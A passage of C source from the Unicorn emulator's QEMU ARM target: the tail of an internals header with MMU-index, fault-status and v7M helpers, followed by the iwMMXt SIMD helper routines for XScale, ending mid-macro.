0x19; break; case ARMFault_AsyncExternal: fsc = 0x11 | (fi->ea << 12); break; case ARMFault_Alignment: fsc = 0x21; break; case ARMFault_Debug: fsc = 0x22; break; case ARMFault_TLBConflict: fsc = 0x30; break; case ARMFault_Lockdown: fsc = 0x34; break; case ARMFault_Exclusive: fsc = 0x35; break; default: /* Other faults can't occur in a context that requires a * long-format status code. */ g_assert_not_reached(); break; } fsc |= 1 << 9; return fsc; } static inline bool arm_extabort_type(MemTxResult result) { /* The EA bit in syndromes and fault status registers is an * IMPDEF classification of external aborts. ARM implementations * usually use this to indicate AXI bus Decode error (0) or * Slave error (1); in QEMU we follow that. */ return result != MEMTX_DECODE_ERROR; } bool arm_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); static inline int arm_to_core_mmu_idx(ARMMMUIdx mmu_idx) { return mmu_idx & ARM_MMU_IDX_COREIDX_MASK; } static inline ARMMMUIdx core_to_arm_mmu_idx(CPUARMState *env, int mmu_idx) { if (arm_feature(env, ARM_FEATURE_M)) { return mmu_idx | ARM_MMU_IDX_M; } else { return mmu_idx | ARM_MMU_IDX_A; } } static inline ARMMMUIdx core_to_aa64_mmu_idx(int mmu_idx) { /* AArch64 is always a-profile. */ return mmu_idx | ARM_MMU_IDX_A; } int arm_mmu_idx_to_el(ARMMMUIdx mmu_idx); /* * Return the MMU index for a v7M CPU with all relevant information * manually specified. 
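 * The caller supplies the security state, privilege level and
 * negative-priority flag explicitly instead of deriving them from
 * the current CPU state.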
*/ ARMMMUIdx arm_v7m_mmu_idx_all(CPUARMState *env, bool secstate, bool priv, bool negpri); /* * Return the MMU index for a v7M CPU in the specified security and * privilege state. */ ARMMMUIdx arm_v7m_mmu_idx_for_secstate_and_priv(CPUARMState *env, bool secstate, bool priv); /* Return the MMU index for a v7M CPU in the specified security state */ ARMMMUIdx arm_v7m_mmu_idx_for_secstate(CPUARMState *env, bool secstate); /* Return true if the stage 1 translation regime is using LPAE format page * tables */ bool arm_s1_regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx); /* Raise a data fault alignment exception for the specified virtual address */ void arm_cpu_do_unaligned_access(CPUState *cs, vaddr vaddr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); /* arm_cpu_do_transaction_failed: handle a memory system error response * (eg "no device/memory present at address") by raising an external abort * exception */ void arm_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); /* Call any registered EL change hooks */ static inline void arm_call_pre_el_change_hook(ARMCPU *cpu) { ARMELChangeHook *hook, *next; QLIST_FOREACH_SAFE(hook, &cpu->pre_el_change_hooks, node, next) { hook->hook(cpu, hook->opaque); } } static inline void arm_call_el_change_hook(ARMCPU *cpu) { ARMELChangeHook *hook, *next; QLIST_FOREACH_SAFE(hook, &cpu->el_change_hooks, node, next) { hook->hook(cpu, hook->opaque); } } /* Return true if this address translation regime has two ranges. */ static inline bool regime_has_2_ranges(ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_SE10_0: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: return true; default: return false; } } /* Return true if this address translation regime is secure */ static inline bool regime_is_secure(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E2: case ARMMMUIdx_Stage2: case ARMMMUIdx_MPrivNegPri: case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MPriv: case ARMMMUIdx_MUser: return false; case ARMMMUIdx_SE3: case ARMMMUIdx_SE10_0: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: case ARMMMUIdx_MSPrivNegPri: case ARMMMUIdx_MSUserNegPri: case ARMMMUIdx_MSPriv: case ARMMMUIdx_MSUser: return true; default: g_assert_not_reached(); // never reach here return true; } } static inline bool regime_is_pan(CPUARMState *env, ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_Stage1_E1_PAN: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_E20_2_PAN: case ARMMMUIdx_SE10_1_PAN: return true; default: return false; } } /* Return the FSR value for a debug exception (watchpoint, hardware * breakpoint or BKPT insn) targeting the specified exception level. 
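 * Whether the long (LPAE) or short descriptor FSR format is used
 * follows the translation regime in use at the target EL.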
*/ static inline uint32_t arm_debug_exception_fsr(CPUARMState *env) { ARMMMUFaultInfo fi = { .type = ARMFault_Debug }; int target_el = arm_debug_target_el(env); bool using_lpae = false; if (target_el == 2 || arm_el_is_aa64(env, target_el)) { using_lpae = true; } else { if (arm_feature(env, ARM_FEATURE_LPAE) && (env->cp15.tcr_el[target_el].raw_tcr & TTBCR_EAE)) { using_lpae = true; } } if (using_lpae) { return arm_fi_to_lfsc(&fi); } else { return arm_fi_to_sfsc(&fi); } } /** * arm_num_brps: Return number of implemented breakpoints. * Note that the ID register BRPS field is "number of bps - 1", * and we return the actual number of breakpoints. */ static inline int arm_num_brps(ARMCPU *cpu) { if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { return FIELD_EX64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, BRPS) + 1; } else { return FIELD_EX32(cpu->isar.dbgdidr, DBGDIDR, BRPS) + 1; } } /** * arm_num_wrps: Return number of implemented watchpoints. * Note that the ID register WRPS field is "number of wps - 1", * and we return the actual number of watchpoints. */ static inline int arm_num_wrps(ARMCPU *cpu) { if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { return FIELD_EX64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, WRPS) + 1; } else { return FIELD_EX32(cpu->isar.dbgdidr, DBGDIDR, WRPS) + 1; } } /** * arm_num_ctx_cmps: Return number of implemented context comparators. * Note that the ID register CTX_CMPS field is "number of cmps - 1", * and we return the actual number of comparators. */ static inline int arm_num_ctx_cmps(ARMCPU *cpu) { if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { return FIELD_EX64(cpu->isar.id_aa64dfr0, ID_AA64DFR0, CTX_CMPS) + 1; } else { return FIELD_EX32(cpu->isar.dbgdidr, DBGDIDR, CTX_CMPS) + 1; } } /* Note make_memop_idx reserves 4 bits for mmu_idx, and MO_BSWAP is bit 3. * Thus a TCGMemOpIdx, without any MO_ALIGN bits, fits in 8 bits. */ #define MEMOPIDX_SHIFT 8 /** * v7m_using_psp: Return true if using process stack pointer * Return true if the CPU is currently using the process stack * pointer, or false if it is using the main stack pointer. */ static inline bool v7m_using_psp(CPUARMState *env) { /* Handler mode always uses the main stack; for thread mode * the CONTROL.SPSEL bit determines the answer. * Note that in v7M it is not possible to be in Handler mode with * CONTROL.SPSEL non-zero, but in v8M it is, so we must check both. */ return !arm_v7m_is_handler_mode(env) && env->v7m.control[env->v7m.secure] & R_V7M_CONTROL_SPSEL_MASK; } /** * v7m_sp_limit: Return SP limit for current CPU state * Return the SP limit value for the current CPU security state * and stack pointer. */ static inline uint32_t v7m_sp_limit(CPUARMState *env) { if (v7m_using_psp(env)) { return env->v7m.psplim[env->v7m.secure]; } else { return env->v7m.msplim[env->v7m.secure]; } } /** * v7m_cpacr_pass: * Return true if the v7M CPACR permits access to the FPU for the specified * security state and privilege level. */ static inline bool v7m_cpacr_pass(CPUARMState *env, bool is_secure, bool is_priv) { switch (extract32(env->v7m.cpacr[is_secure], 20, 2)) { case 0: case 2: /* UNPREDICTABLE: we treat like 0 */ return false; case 1: return is_priv; case 3: return true; default: g_assert_not_reached(); // never reach here return true; } } /** * aarch32_mode_name(): Return name of the AArch32 CPU mode * @psr: Program Status Register indicating CPU mode * * Returns, for debug logging purposes, a printable representation * of the AArch32 CPU mode ("svc", "usr", etc) as indicated by * the low bits of the specified PSR. 
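*/

/*
 * Added illustration (hypothetical helper): a typical consumer of
 * v7m_sp_limit(), checking whether pushing 'bytes' onto the current
 * stack would violate the active stack limit.
 */
static inline bool v7m_push_would_overflow_sketch(CPUARMState *env,
                                                  uint32_t bytes)
{
    /* The stack grows downwards, so compare the prospective new SP */
    return (env->regs[13] - bytes) < v7m_sp_limit(env);
}

/* Printable AArch32 mode name, for debug logging: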
*/ static inline const char *aarch32_mode_name(uint32_t psr) { static const char cpu_mode_names[16][4] = { "usr", "fiq", "irq", "svc", "???", "???", "mon", "abt", "???", "???", "hyp", "und", "???", "???", "???", "sys" }; return cpu_mode_names[psr & 0xf]; } /** * arm_cpu_update_virq: Update CPU_INTERRUPT_VIRQ bit in cs->interrupt_request * * Update the CPU_INTERRUPT_VIRQ bit in cs->interrupt_request, following * a change to either the input VIRQ line from the GIC or the HCR_EL2.VI bit. * Must be called with the iothread lock held. */ void arm_cpu_update_virq(ARMCPU *cpu); /** * arm_cpu_update_vfiq: Update CPU_INTERRUPT_VFIQ bit in cs->interrupt_request * * Update the CPU_INTERRUPT_VFIQ bit in cs->interrupt_request, following * a change to either the input VFIQ line from the GIC or the HCR_EL2.VF bit. * Must be called with the iothread lock held. */ void arm_cpu_update_vfiq(ARMCPU *cpu); /** * arm_mmu_idx_el: * @env: The cpu environment * @el: The EL to use. * * Return the full ARMMMUIdx for the translation regime for EL. */ ARMMMUIdx arm_mmu_idx_el(CPUARMState *env, int el); /** * arm_mmu_idx: * @env: The cpu environment * * Return the full ARMMMUIdx for the current translation regime. */ ARMMMUIdx arm_mmu_idx(CPUARMState *env); /** * arm_stage1_mmu_idx: * @env: The cpu environment * * Return the ARMMMUIdx for the stage1 traversal for the current regime. */ ARMMMUIdx arm_stage1_mmu_idx(CPUARMState *env); /** * arm_mmu_idx_is_stage1_of_2: * @mmu_idx: The ARMMMUIdx to test * * Return true if @mmu_idx is a NOTLB mmu_idx that is the * first stage of a two stage regime. */ static inline bool arm_mmu_idx_is_stage1_of_2(ARMMMUIdx mmu_idx) { switch (mmu_idx) { case ARMMMUIdx_Stage1_E0: case ARMMMUIdx_Stage1_E1: case ARMMMUIdx_Stage1_E1_PAN: return true; default: return false; } } static inline uint32_t aarch32_cpsr_valid_mask(uint64_t features, const ARMISARegisters *id) { uint32_t valid = CPSR_M | CPSR_AIF | CPSR_IL | CPSR_NZCV; if ((features >> ARM_FEATURE_V4T) & 1) { valid |= CPSR_T; } if ((features >> ARM_FEATURE_V5) & 1) { valid |= CPSR_Q; /* V5TE in reality*/ } if ((features >> ARM_FEATURE_V6) & 1) { valid |= CPSR_E | CPSR_GE; } if ((features >> ARM_FEATURE_THUMB2) & 1) { valid |= CPSR_IT; } if (isar_feature_aa32_jazelle(id)) { valid |= CPSR_J; } if (isar_feature_aa32_pan(id)) { valid |= CPSR_PAN; } return valid; } static inline uint32_t aarch64_pstate_valid_mask(const ARMISARegisters *id) { uint32_t valid; valid = PSTATE_M | PSTATE_DAIF | PSTATE_IL | PSTATE_SS | PSTATE_NZCV; if (isar_feature_aa64_bti(id)) { valid |= PSTATE_BTYPE; } if (isar_feature_aa64_pan(id)) { valid |= PSTATE_PAN; } if (isar_feature_aa64_uao(id)) { valid |= PSTATE_UAO; } return valid; } /* * Parameters of a given virtual address, as extracted from the * translation control register (TCR) for a given regime. */ typedef struct ARMVAParameters { unsigned tsz : 8; unsigned select : 1; bool tbi : 1; bool epd : 1; bool hpd : 1; bool using16k : 1; bool using64k : 1; } ARMVAParameters; ARMVAParameters aa64_va_parameters(CPUARMState *env, uint64_t va, ARMMMUIdx mmu_idx, bool data); static inline int exception_target_el(CPUARMState *env) { int target_el = MAX(1, arm_current_el(env)); /* * No such thing as secure EL1 if EL3 is aarch32, * so update the target EL to EL3 in this case. */ if (arm_is_secure(env) && !arm_el_is_aa64(env, 3) && target_el == 1) { target_el = 3; } return target_el; } /* Security attributes for an address, as returned by v8m_security_lookup. 
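*/

/*
 * Added illustration (hypothetical helper; assumes a CPU with only the
 * V4T/V5/V6 features set): the CPSR valid mask grows feature by feature
 * on top of CPSR_M | CPSR_AIF | CPSR_IL | CPSR_NZCV.
 */
static inline uint32_t cpsr_valid_mask_sketch(const ARMISARegisters *id)
{
    uint64_t features = (1ULL << ARM_FEATURE_V4T) |
                        (1ULL << ARM_FEATURE_V5) |
                        (1ULL << ARM_FEATURE_V6);

    /* adds CPSR_T, then CPSR_Q, then CPSR_E | CPSR_GE */
    return aarch32_cpsr_valid_mask(features, id);
}

/* Security attributes for a v8M address, filled in by v8m_security_lookup: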
*/

typedef struct V8M_SAttributes {
    bool subpage; /* true if these attrs don't cover the whole TARGET_PAGE */
    bool ns;
    bool nsc;
    uint8_t sregion;
    bool srvalid;
    uint8_t iregion;
    bool irvalid;
} V8M_SAttributes;

void v8m_security_lookup(CPUARMState *env, uint32_t address,
                         MMUAccessType access_type, ARMMMUIdx mmu_idx,
                         V8M_SAttributes *sattrs);

bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address,
                       MMUAccessType access_type, ARMMMUIdx mmu_idx,
                       hwaddr *phys_ptr, MemTxAttrs *txattrs,
                       int *prot, bool *is_subpage,
                       ARMMMUFaultInfo *fi, uint32_t *mregion);

/* Cacheability and shareability attributes for a memory access */
typedef struct ARMCacheAttrs {
    unsigned int attrs:8; /* as in the MAIR register encoding */
    unsigned int shareability:2; /* as in the SH field of the VMSAv8-64 PTEs */
} ARMCacheAttrs;

bool get_phys_addr(CPUARMState *env, target_ulong address,
                   MMUAccessType access_type, ARMMMUIdx mmu_idx,
                   hwaddr *phys_ptr, MemTxAttrs *attrs, int *prot,
                   target_ulong *page_size,
                   ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs);

void arm_log_exception(int idx);

#endif

/* ==== file: unicorn-2.1.1/qemu/target/arm/iwmmxt_helper.c ==== */

/*
 * iwMMXt micro operations for XScale.
 *
 * Copyright (c) 2007 OpenedHand, Ltd.
 * Written by Andrzej Zaborowski <andrew@openedhand.com>
 * Copyright (c) 2008 CodeSourcery
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"

/* iwMMXt macros extracted from GNU gdb. */

/* Set the SIMD wCASF flags for 8, 16, 32 or 64-bit operations. */
#define SIMD8_SET(v, n, b)  ((v != 0) << ((((b) + 1) * 4) + (n)))
#define SIMD16_SET(v, n, h) ((v != 0) << ((((h) + 1) * 8) + (n)))
#define SIMD32_SET(v, n, w) ((v != 0) << ((((w) + 1) * 16) + (n)))
#define SIMD64_SET(v, n)    ((v != 0) << (32 + (n)))
/* Flags to pass as "n" above. */
#define SIMD_NBIT -1
#define SIMD_ZBIT -2
#define SIMD_CBIT -3
#define SIMD_VBIT -4
/* Various status bit macros.
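*/

/*
 * Added worked example (hypothetical helper): SIMD16_SET() places flag
 * "n" of 16-bit lane "h" in wCASF at bit (h + 1) * 8 + n, with n one of
 * the negative SIMD_*BIT indices; so the Z flag of lane 1 lands at bit
 * (1 + 1) * 8 + SIMD_ZBIT == 14.
 */
static inline uint32_t simd16_zbit_lane1_sketch(uint64_t lane_is_zero)
{
    return SIMD16_SET(lane_is_zero, SIMD_ZBIT, 1); /* bit 14, or 0 */
}

/* Per-width N and Z status bit tests: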
*/ #define NBIT8(x) ((x) & 0x80) #define NBIT16(x) ((x) & 0x8000) #define NBIT32(x) ((x) & 0x80000000) #define NBIT64(x) ((x) & 0x8000000000000000ULL) #define ZBIT8(x) (((x) & 0xff) == 0) #define ZBIT16(x) (((x) & 0xffff) == 0) #define ZBIT32(x) (((x) & 0xffffffff) == 0) #define ZBIT64(x) (x == 0) /* Sign extension macros. */ #define EXTEND8H(a) ((uint16_t) (int8_t) (a)) #define EXTEND8(a) ((uint32_t) (int8_t) (a)) #define EXTEND16(a) ((uint32_t) (int16_t) (a)) #define EXTEND16S(a) ((int32_t) (int16_t) (a)) #define EXTEND32(a) ((uint64_t) (int32_t) (a)) uint64_t HELPER(iwmmxt_maddsq)(uint64_t a, uint64_t b) { a = (( EXTEND16S((a >> 0) & 0xffff) * EXTEND16S((b >> 0) & 0xffff) + EXTEND16S((a >> 16) & 0xffff) * EXTEND16S((b >> 16) & 0xffff) ) & 0xffffffff) | ((uint64_t) ( EXTEND16S((a >> 32) & 0xffff) * EXTEND16S((b >> 32) & 0xffff) + EXTEND16S((a >> 48) & 0xffff) * EXTEND16S((b >> 48) & 0xffff) ) << 32); return a; } uint64_t HELPER(iwmmxt_madduq)(uint64_t a, uint64_t b) { a = (( ((a >> 0) & 0xffff) * ((b >> 0) & 0xffff) + ((a >> 16) & 0xffff) * ((b >> 16) & 0xffff) ) & 0xffffffff) | (( ((a >> 32) & 0xffff) * ((b >> 32) & 0xffff) + ((a >> 48) & 0xffff) * ((b >> 48) & 0xffff) ) << 32); return a; } uint64_t HELPER(iwmmxt_sadb)(uint64_t a, uint64_t b) { #define abs(x) (((x) >= 0) ? x : -x) #define SADB(SHR) abs((int) ((a >> SHR) & 0xff) - (int) ((b >> SHR) & 0xff)) return SADB(0) + SADB(8) + SADB(16) + SADB(24) + SADB(32) + SADB(40) + SADB(48) + SADB(56); #undef SADB } uint64_t HELPER(iwmmxt_sadw)(uint64_t a, uint64_t b) { #define SADW(SHR) \ abs((int) ((a >> SHR) & 0xffff) - (int) ((b >> SHR) & 0xffff)) return SADW(0) + SADW(16) + SADW(32) + SADW(48); #undef SADW } uint64_t HELPER(iwmmxt_mulslw)(uint64_t a, uint64_t b) { #define MULS(SHR) ((uint64_t) ((( \ EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ ) >> 0) & 0xffff) << SHR) return MULS(0) | MULS(16) | MULS(32) | MULS(48); #undef MULS } uint64_t HELPER(iwmmxt_mulshw)(uint64_t a, uint64_t b) { #define MULS(SHR) ((uint64_t) ((( \ EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ ) >> 16) & 0xffff) << SHR) return MULS(0) | MULS(16) | MULS(32) | MULS(48); #undef MULS } uint64_t HELPER(iwmmxt_mululw)(uint64_t a, uint64_t b) { #define MULU(SHR) ((uint64_t) ((( \ ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ ) >> 0) & 0xffff) << SHR) return MULU(0) | MULU(16) | MULU(32) | MULU(48); #undef MULU } uint64_t HELPER(iwmmxt_muluhw)(uint64_t a, uint64_t b) { #define MULU(SHR) ((uint64_t) ((( \ ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ ) >> 16) & 0xffff) << SHR) return MULU(0) | MULU(16) | MULU(32) | MULU(48); #undef MULU } uint64_t HELPER(iwmmxt_macsw)(uint64_t a, uint64_t b) { #define MACS(SHR) ( \ EXTEND16((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff)) return (int64_t) (MACS(0) + MACS(16) + MACS(32) + MACS(48)); #undef MACS } uint64_t HELPER(iwmmxt_macuw)(uint64_t a, uint64_t b) { #define MACU(SHR) ( \ (uint32_t) ((a >> SHR) & 0xffff) * \ (uint32_t) ((b >> SHR) & 0xffff)) return MACU(0) + MACU(16) + MACU(32) + MACU(48); #undef MACU } #define NZBIT8(x, i) \ SIMD8_SET(NBIT8((x) & 0xff), SIMD_NBIT, i) | \ SIMD8_SET(ZBIT8((x) & 0xff), SIMD_ZBIT, i) #define NZBIT16(x, i) \ SIMD16_SET(NBIT16((x) & 0xffff), SIMD_NBIT, i) | \ SIMD16_SET(ZBIT16((x) & 0xffff), SIMD_ZBIT, i) #define NZBIT32(x, i) \ SIMD32_SET(NBIT32((x) & 0xffffffff), SIMD_NBIT, i) | \ SIMD32_SET(ZBIT32((x) & 0xffffffff), SIMD_ZBIT, i) #define NZBIT64(x) \ SIMD64_SET(NBIT64(x), SIMD_NBIT) | \ SIMD64_SET(ZBIT64(x), SIMD_ZBIT) #define 
IWMMXT_OP_UNPACK(S, SH0, SH1, SH2, SH3) \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, b)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ (((a >> SH0) & 0xff) << 0) | (((b >> SH0) & 0xff) << 8) | \ (((a >> SH1) & 0xff) << 16) | (((b >> SH1) & 0xff) << 24) | \ (((a >> SH2) & 0xff) << 32) | (((b >> SH2) & 0xff) << 40) | \ (((a >> SH3) & 0xff) << 48) | (((b >> SH3) & 0xff) << 56); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | \ NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, w)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ (((a >> SH0) & 0xffff) << 0) | \ (((b >> SH0) & 0xffff) << 16) | \ (((a >> SH2) & 0xffff) << 32) | \ (((b >> SH2) & 0xffff) << 48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT8(a >> 0, 0) | NZBIT8(a >> 16, 1) | \ NZBIT8(a >> 32, 2) | NZBIT8(a >> 48, 3); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, l)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ (((a >> SH0) & 0xffffffff) << 0) | \ (((b >> SH0) & 0xffffffff) << 32); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ub)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ (((x >> SH0) & 0xff) << 0) | \ (((x >> SH1) & 0xff) << 16) | \ (((x >> SH2) & 0xff) << 32) | \ (((x >> SH3) & 0xff) << 48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, uw)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ (((x >> SH0) & 0xffff) << 0) | \ (((x >> SH2) & 0xffff) << 32); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ul)))(CPUARMState *env, \ uint64_t x) \ { \ x = (((x >> SH0) & 0xffffffff) << 0); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sb)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ ((uint64_t) EXTEND8H((x >> SH0) & 0xff) << 0) | \ ((uint64_t) EXTEND8H((x >> SH1) & 0xff) << 16) | \ ((uint64_t) EXTEND8H((x >> SH2) & 0xff) << 32) | \ ((uint64_t) EXTEND8H((x >> SH3) & 0xff) << 48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sw)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ ((uint64_t) EXTEND16((x >> SH0) & 0xffff) << 0) | \ ((uint64_t) EXTEND16((x >> SH2) & 0xffff) << 32); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sl)))(CPUARMState *env, \ uint64_t x) \ { \ x = EXTEND32((x >> SH0) & 0xffffffff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ return x; \ } IWMMXT_OP_UNPACK(l, 0, 8, 16, 24) IWMMXT_OP_UNPACK(h, 32, 40, 48, 56) #define IWMMXT_OP_CMP(SUFF, Tb, Tw, Tl, O) \ uint64_t HELPER(glue(iwmmxt_, glue(SUFF, b)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ CMP(0, Tb, O, 0xff) | CMP(8, Tb, O, 0xff) | \ CMP(16, Tb, O, 0xff) | CMP(24, Tb, O, 0xff) | \ CMP(32, Tb, O, 0xff) | CMP(40, Tb, O, 0xff) | \ CMP(48, Tb, O, 0xff) | CMP(56, Tb, O, 0xff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ NZBIT8(a >> 16, 2) 
| NZBIT8(a >> 24, 3) | \ NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_, glue(SUFF, w)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = CMP(0, Tw, O, 0xffff) | CMP(16, Tw, O, 0xffff) | \ CMP(32, Tw, O, 0xffff) | CMP(48, Tw, O, 0xffff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | \ NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_, glue(SUFF, l)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = CMP(0, Tl, O, 0xffffffff) | \ CMP(32, Tl, O, 0xffffffff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ return a; \ } #define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ (TYPE) ((b >> SHR) & MASK)) ? (uint64_t) MASK : 0) << SHR) IWMMXT_OP_CMP(cmpeq, uint8_t, uint16_t, uint32_t, ==) IWMMXT_OP_CMP(cmpgts, int8_t, int16_t, int32_t, >) IWMMXT_OP_CMP(cmpgtu, uint8_t, uint16_t, uint32_t, >) #undef CMP #define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ (TYPE) ((b >> SHR) & MASK)) ? a : b) & ((uint64_t) MASK << SHR)) IWMMXT_OP_CMP(mins, int8_t, int16_t, int32_t, <) IWMMXT_OP_CMP(minu, uint8_t, uint16_t, uint32_t, <) IWMMXT_OP_CMP(maxs, int8_t, int16_t, int32_t, >) IWMMXT_OP_CMP(maxu, uint8_t, uint16_t, uint32_t, >) #undef CMP #define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) IWMMXT_OP_CMP(subn, uint8_t, uint16_t, uint32_t, -) IWMMXT_OP_CMP(addn, uint8_t, uint16_t, uint32_t, +) #undef CMP /* TODO Signed- and Unsigned-Saturation */ #define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) IWMMXT_OP_CMP(subu, uint8_t, uint16_t, uint32_t, -) IWMMXT_OP_CMP(addu, uint8_t, uint16_t, uint32_t, +) IWMMXT_OP_CMP(subs, int8_t, int16_t, int32_t, -) IWMMXT_OP_CMP(adds, int8_t, int16_t, int32_t, +) #undef CMP #undef IWMMXT_OP_CMP #define AVGB(SHR) ((( \ ((a >> SHR) & 0xff) + ((b >> SHR) & 0xff) + round) >> 1) << SHR) #define IWMMXT_OP_AVGB(r) \ uint64_t HELPER(iwmmxt_avgb##r)(CPUARMState *env, uint64_t a, uint64_t b) \ { \ const int round = r; \ a = AVGB(0) | AVGB(8) | AVGB(16) | AVGB(24) | \ AVGB(32) | AVGB(40) | AVGB(48) | AVGB(56); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ SIMD8_SET(ZBIT8((a >> 0) & 0xff), SIMD_ZBIT, 0) | \ SIMD8_SET(ZBIT8((a >> 8) & 0xff), SIMD_ZBIT, 1) | \ SIMD8_SET(ZBIT8((a >> 16) & 0xff), SIMD_ZBIT, 2) | \ SIMD8_SET(ZBIT8((a >> 24) & 0xff), SIMD_ZBIT, 3) | \ SIMD8_SET(ZBIT8((a >> 32) & 0xff), SIMD_ZBIT, 4) | \ SIMD8_SET(ZBIT8((a >> 40) & 0xff), 